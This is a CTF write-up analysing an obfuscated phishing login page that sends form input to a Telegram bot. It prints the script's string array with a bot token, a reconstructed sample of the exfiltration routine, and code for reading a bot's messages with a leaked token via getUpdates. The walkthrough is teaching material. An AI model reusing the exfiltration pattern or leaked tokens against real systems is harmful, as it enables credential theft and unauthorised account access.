## Brief

**Broken Bot** is a web-based CTF challenge that tests your JavaScript
deobfuscation and malware analysis skills. Your task is to investigate a
compromised Cloud Storage Portal, decode obfuscated JavaScript code, and
perform API queries to extract sensitive information. By detecting a
misconfiguration, you can find the flag and demonstrate your cybersecurity
expertise.

**Expertise:**

* Basic knowledge of JavaScript  
* Familiarity with JavaScript obfuscation techniques  
* Understanding of how malware can be concealed in JavaScript code  
* Ability to identify and analyze malicious code  
* Proficiency in using browser developer tools for web debugging and analysis

**Acquired Knowledge:**

* JavaScript deobfuscation  
* Malware analysis  
* API query and analysis  
* Misconfiguration detection

## Enumeration

To start the challenge, we need to access the provided Cloud Storage Portal.
This can be done by spawning the Docker container and accessing the IP address
assigned to it. Upon accessing the IP, we will be directed to the login page
for the Cloud Storage Portal.

![](https://vasic.dev/blog/wp-content/uploads/2023/04/RIT_1-1024x560.png)

With the login page in front of us, the thing to examine is the JavaScript
served with index.html. Before doing so, it is worth submitting a random
password to see what the form actually does. When attempting to log in with
an incorrect password, I was redirected to another site, containing a
voicemail. This indicates that the login was not successful, but it also
gives us a hint that something unexpected is happening in the background: a
failed login has no business bouncing the user to another site. With this in
mind, we can proceed to view the JavaScript running in index.html to identify
what it does.

## Exploitation

To view the JavaScript running in index.html, open the browser's developer
tools, go to the "Sources" tab and locate index.html, or simply view the page
source.

![](https://vasic.dev/blog/wp-content/uploads/2023/04/RIT_2-1024x530.png)

The script is obfuscated in the string-array style: every string the code
needs (jQuery selectors, property names, URL fragments) is stored once in an
array, and the code refers to them only by index, so nothing in it reads
naturally. Deobfuscating can be done by hand, by evaluating the pieces in the
browser console, or with automated tools. Once the code is deobfuscated, we
should be able to identify the API call being made, including the URL, the
HTTP method, and any headers or parameters sent with the request. The array
itself already gives the game away:

```
// the two <img ...> entries were mangled by the page's HTML-to-markdown
// conversion and are reconstructed here from what survived
var AC = ["val", "12ZidQyC", "20AFlrCY", "Email: ", "63792quNVYn",
"substring", "append", "Region : ", "slice", "body", "139437pXYFEK",
"#UserEmail", "toUpperCase", "click", "Useragent : ", "href", "88GpIPQU",
"904cdojGd", "#submit", "#dname", '<img src=https://logo.clearbit.com/', '>',
"4716964xBODFJ", "3724320KAqSuZ", "5852841790", "Date Filled : ",
"#inputPassword", "380874lxWkrT", "1170928pBbGzs",
"https://api.telegram.org/bot", "head",
"6055124896:AAFyQlC_8dr1GndB26ji4iV2ol2bPPQ9lq4"];
```
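The array is the whole obfuscation: the rest of the script contains no readable string, only index lookups such as `AC[0x1c]`. Entries like `"12ZidQyC"` and `"63792quNVYn"` are not data at all; they are the checksum strings of javascript-obfuscator's array-rotation routine, which runs `parseInt()` over their numeric prefix, and can be ignored. The following is an added example, not code from the challenge or from the original writeup: it cuts such an array out of the source text, replaces every indexed reference with the literal it stands for, rewrites `obj["prop"]` back to `obj.prop`, and filters the recovered strings for anything shaped like a Telegram bot token. The `SAMPLE` source inside it is constructed to mimic the page's script (same array name and labels); its token, chat id and redirect URL are fake placeholders. It assumes the array is already in its final order; if the script also carries a rotation IIFE (a loop that `parseInt`s array members and `push`/`shift`s the array until a checksum matches), execute only that loop in the console first and run this against the rotated array.

```javascript
// Added example, not code from the challenge or the original writeup: resolve a
// javascript-obfuscator style string array so that AC[0x1c]-style references
// become readable literals, then scan the recovered strings for credentials.
// SAMPLE is constructed to mimic the pattern on the page (same array name and
// labels); its token, chat id and redirect URL are fake placeholders.
const SAMPLE = `
var AC = ["val", "Email: ", "#UserEmail", "href", "https://api.telegram.org/bot",
  "1234567890:AAFakeTokenForTheAddedExample000000", "/sendMessage?chat_id=",
  "5555555555", "&text=", "https://example.invalid/voicemail", '\\x23submit', "]"];
$(AC[0xa]).on("click", function () {
  var e = $(AC[0x2])[AC[0x0]]();
  var u = AC[0x4] + AC[0x5] + AC[0x6] + AC[0x7] + AC[0x8] + encodeURIComponent(AC[0x1] + e);
  fetch(u).finally(function () { window.location[AC[0x3]] = AC[0x9]; });
});
`;

// Decode the body of a JS string literal: \xHH, \uHHHH and the usual
// single-character escapes, which obfuscators lean on heavily.
function decodeLiteral(body) {
  const simple = { n: '\n', t: '\t', r: '\r', b: '\b', f: '\f', v: '\v', '0': '\0' };
  return body.replace(/\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)/g, (_, esc) => {
    if (/^[xu]/.test(esc) && esc.length > 1) return String.fromCharCode(parseInt(esc.slice(1), 16));
    return esc in simple ? simple[esc] : esc;   // \' \" \\ map to themselves
  });
}

// Cut the body of `name = [ ... ]` out of the source without being fooled by a
// ']' that sits inside one of the strings.
function sliceArrayLiteral(source, name) {
  const m = new RegExp(`\\b${name}\\s*=\\s*\\[`).exec(source);
  if (!m) throw new Error(`no array literal assigned to ${name}`);
  const open = m.index + m[0].length;
  let quote = null;
  for (let i = open; i < source.length; i++) {
    const c = source[i];
    if (quote) {
      if (c === '\\') i++;                 // skip the escaped character
      else if (c === quote) quote = null;
    } else if (c === '"' || c === "'" || c === '`') {
      quote = c;
    } else if (c === ']') {
      return source.slice(open, i);
    }
  }
  throw new Error(`unterminated array literal for ${name}`);
}

// Pull every string literal out of the array body, in order, decoded.
function extractStringArray(source, name) {
  const body = sliceArrayLiteral(source, name);
  const literal = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;
  const out = [];
  for (let t; (t = literal.exec(body)) !== null; ) {
    out.push(decodeLiteral(t[1] !== undefined ? t[1] : t[2]));
  }
  return out;
}

// Replace name[index] (decimal or hex) with the literal it stands for, then turn
// obj["prop"] back into obj.prop so the jQuery calls read naturally.
function resolveReferences(source, name, strings) {
  const ref = new RegExp(`\\b${name}\\[(0x[0-9a-fA-F]+|\\d+)\\]`, 'g');
  return source
    .replace(ref, (whole, idx) => {
      const i = Number(idx);               // Number('0x1c') === 28
      return i < strings.length ? JSON.stringify(strings[i]) : whole;
    })
    .replace(/\["([A-Za-z_$][\w$]*)"\]/g, '.$1');
}

// Telegram bot tokens have a fixed shape: bot id, a colon, 35 URL-safe chars.
function findBotTokens(strings) {
  return strings.filter(s => /^\d{8,10}:[A-Za-z0-9_-]{35}$/.test(s));
}

function deobfuscate(source, name) {
  const strings = extractStringArray(source, name);
  return { strings, code: resolveReferences(source, name, strings), tokens: findBotTokens(strings) };
}

const result = deobfuscate(SAMPLE, 'AC');
console.log(result.code);
console.log('bot tokens:', result.tokens);
```

Run it with `node` on the saved page source after swapping `SAMPLE` for the file contents; the resolved code shows the form values being read, the `sendMessage` URL being assembled from the token and chat id, and the redirect that follows.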

Interesting. The array spells out the whole exfiltration routine: jQuery
selectors for the form fields (`#UserEmail`, `#inputPassword`, `#submit`),
the labels of the data that gets reported (`Email: `, `Region : `,
`Useragent : `, `Date Filled : `), the Telegram Bot API base URL, a bare
numeric string (`5852841790`) that in this context is most likely the
`chat_id` the bot posts to, and, at the end, the bot token itself. With the
token in hand, we can query the Telegram Bot API directly as the bot.

![](https://vasic.dev/blog/wp-content/uploads/2023/04/RIT_4.png)

Telegram's bot "privacy mode" only controls which group messages a bot
receives; it is not an access control on the API. The token is the bot's only
credential, so anyone holding it can act as the bot, including reading every
update the bot has received that its owner has not yet consumed (the server
keeps unconfirmed updates for up to 24 hours). That is the misconfiguration
here: the token is shipped to every visitor in client-side JavaScript, and the
bot collects its messages by polling rather than through a webhook, so an HTTP
GET to `https://api.telegram.org/bot<API_KEY>/getUpdates` returns the pending
messages. Two caveats for the query: getUpdates answers 409 Conflict while a
webhook is active, and passing an `offset` parameter confirms, and thereby
deletes server-side, every update with a smaller id, so leave it out if you
want to keep what is there. [More
here.](https://core.telegram.org/bots/api#getupdates)

![](https://vasic.dev/blog/wp-content/uploads/2023/04/RIT_Flag-1024x840.png)

By examining the JSON response of the getUpdates call, we can identify the
flag **Flag{Always_Check_For_Misconfigurations}**, which had been posted to
the bot as a message.
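The following is an added example, not code from the writeup: it builds Bot API URLs for a leaked token, parses a `getUpdates` response into plain messages, pulls any flag out of them, and shows the two answers the endpoint gives (pending updates while the bot polls, 409 Conflict once a webhook is set). Only the parsing runs; the responses are constructed samples in the documented `getUpdates` shape, the message texts mimic the labels from the obfuscated array and the flag from this writeup, and the token and chat id are fake placeholders. The `offset` computation is included to show what acknowledges updates, not for use while investigating.

```javascript
// Added example, not code from the writeup: querying the Bot API with a leaked
// token and reading what getUpdates returns. Only the parsing runs here; the
// responses below are constructed samples in the documented getUpdates shape,
// and TOKEN and the chat id are fake placeholders.
const TOKEN = '1234567890:AAFakeTokenForTheAddedExample000000'; // placeholder
const API = 'https://api.telegram.org';

// Build https://api.telegram.org/bot<token>/<method>?k=v for any Bot API method
// (getMe to confirm the token works, getWebhookInfo, getUpdates, ...).
function botApiUrl(token, method, params = {}) {
  const u = new URL(`${API}/bot${token}/${method}`);
  for (const [k, v] of Object.entries(params)) u.searchParams.set(k, String(v));
  return u.toString();
}

// Constructed sample of the answer while no webhook is set.
const SAMPLE_OK = {
  ok: true,
  result: [
    { update_id: 700000001,
      message: { message_id: 1, date: 1681000000,
        chat: { id: 5555555555, type: 'private' },
        text: 'Email: victim@example.invalid\nRegion : EU\nUseragent : Mozilla/5.0\nDate Filled : 2023-04-01' } },
    { update_id: 700000002,
      message: { message_id: 2, date: 1681000100,
        chat: { id: 5555555555, type: 'private' },
        text: 'Flag{Always_Check_For_Misconfigurations}' } },
    // an update that is not a new message; parsers must not choke on it
    { update_id: 700000003,
      edited_message: { message_id: 1, date: 1681000200,
        chat: { id: 5555555555, type: 'private' }, text: 'edited' } },
  ],
};

// Constructed sample of the answer once the owner has configured a webhook.
const SAMPLE_CONFLICT = {
  ok: false, error_code: 409,
  description: "Conflict: can't use getUpdates method while webhook is active; use deleteWebhook to delete the webhook first",
};

// Flatten the updates into plain messages. Non-message updates are skipped and
// an API error is surfaced instead of silently yielding an empty list.
function messagesFrom(response) {
  if (!response.ok) throw new Error(`Bot API error ${response.error_code}: ${response.description}`);
  return response.result
    .filter(u => u.message && typeof u.message.text === 'string')
    .map(u => ({
      updateId: u.update_id,
      chatId: u.message.chat.id,
      sentAt: new Date(u.message.date * 1000).toISOString(),
      text: u.message.text,
    }));
}

// The offset that would acknowledge everything seen so far. Sending it makes
// the server drop those updates for good, so a read-only investigation must
// not pass it; it is computed only to show what the bot's own consumer does.
function nextOffset(response) {
  if (!response.result.length) return null;
  return Math.max(...response.result.map(u => u.update_id)) + 1;
}

function findFlags(messages, pattern = /Flag\{[^}]+\}/g) {
  return messages.flatMap(m => m.text.match(pattern) || []);
}

// Live use (Node 18+, needs network): poll once, without offset, then parse.
async function dumpUpdates(token) {
  const res = await fetch(botApiUrl(token, 'getUpdates', { timeout: 0 }));
  return messagesFrom(await res.json());
}

console.log(botApiUrl(TOKEN, 'getUpdates', { timeout: 0 }));
console.log(messagesFrom(SAMPLE_OK));
console.log('flags:', findFlags(messagesFrom(SAMPLE_OK)));
```

If the live call returns the 409 sample instead, the bot's owner has since switched to a webhook; `deleteWebhook` would clear it but also breaks the owner's delivery, which is well outside what a CTF or an investigation should do.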

Original writeup (https://vasic.dev/blog/ritsec-ctf/#Broken_Bot).